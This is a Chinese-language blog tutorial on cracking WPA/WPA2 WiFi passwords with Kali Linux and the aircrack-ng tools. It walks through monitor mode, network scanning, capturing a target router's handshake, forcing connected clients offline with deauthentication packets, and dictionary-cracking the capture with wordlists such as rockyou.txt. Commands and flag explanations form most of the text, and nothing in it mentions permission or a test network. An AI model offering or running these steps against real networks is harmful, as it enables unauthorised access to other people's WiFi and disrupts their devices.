破解WIFI教程

软件发布|下载排行|最新软件

当前位置:首页IT学院IT技术

破解WIFI教程

KING-TING   2020-03-28 我要评论
# 今日主题:如何破解WIFI ### 准备工具 >- 笔记本一台 >- usb无线网卡【我用的是小米的】 >- kali系统【可以在虚拟机里装,建议用2019年及以下版本】 ### VMware Workstation15虚拟机安装 可以参考`https://www.jianshu.com/p/552179808ebf` ### kali安装 可以参考`https://www.cnblogs.com/changjue/p/11244585.html` ### WIFI加密方式 `1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。` `2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。` `3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。` ## 一 打开`虚拟机`,插入`usb网卡`,把`网卡`放到`虚拟机`来 ![](https://imgkr.cn-bj.ufileos.com/596aea72-ae8f-45af-927b-c376a2129da2.png) 桌面`右键`,选择`Open in Terminal`打开终端 ![](https://imgkr.cn-bj.ufileos.com/349320fe-9b26-495e-96cc-50017398e622.png) ## 二 显示网卡信息 airmon-ng ![](https://imgkr.cn-bj.ufileos.com/39dbeaae-0cd4-4338-a56a-8e39a9e5909f.png) 开启网卡监控 airmon-ng start wlan0 ![](https://imgkr.cn-bj.ufileos.com/f7e25a5f-a597-45bf-ae46-2384990945a5.png) 用ifconfig命令查看一下网卡信息 ifconfig 可以看到网卡的名字已经变了 ![](https://imgkr.cn-bj.ufileos.com/68d1c08c-2731-408d-8356-22954bd260ed.png) ## 三 扫描WIFI信号 airodump-ng wlan0mon ![](https://imgkr.cn-bj.ufileos.com/0c4fa4df-f8cd-4d83-8e50-1fb4ad697cd8.png) 拿到握手包 airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one 解释: ` -c:指定信道[ch]` ` -w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字` ` --bssid:指定路由器的MAC` ![](https://imgkr.cn-bj.ufileos.com/ba54631f-b704-4b50-809e-ded00af3dee9.png) 再开一个终端输入命令 aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one 使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包 解释: `-0:指定发送反认证包的个数(阿利伯数字0)` `-a:指定路由器的MAC` ` -c:指定客户机的MAC` ![](https://imgkr.cn-bj.ufileos.com/4579048f-b254-46b2-a961-4d56f0d18fe1.png) 出现下图就是抓取成功 ![](https://imgkr.cn-bj.ufileos.com/e6de89cd-ae66-4576-b3d5-9b66f09c5263.png) 破解握手包 aircrack-ng -w dict freedom-*.cap `dict:字典的名字` ` freedom-*.cap:握手包` 破解成功 ![](https://imgkr.cn-bj.ufileos.com/ad44780b-9e89-4280-9f20-da1220e620a4.png) ### 补充 - 系统自带了密码字典,我用的是我自己的 字典位置如下: /usr/share/john/password.lst /usr/share/wfuzz/wordlist /usr/share/ wordlists/rockyou.txt 最后一个路径下的文件默认是压缩的,可以通过以下命令解压 ![](https://imgkr.cn-bj.ufileos.com/fc7a1561-f12e-4df8-a84c-fe661b77bd33.png) - 反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包 - 信号扫描结束或者进程终止:ctrl+c ---

Copyright 2022 版权所有 软件发布 访问手机版

声明:所有软件和文章来自软件开发商或者作者 如有异议 请与本站联系 联系我们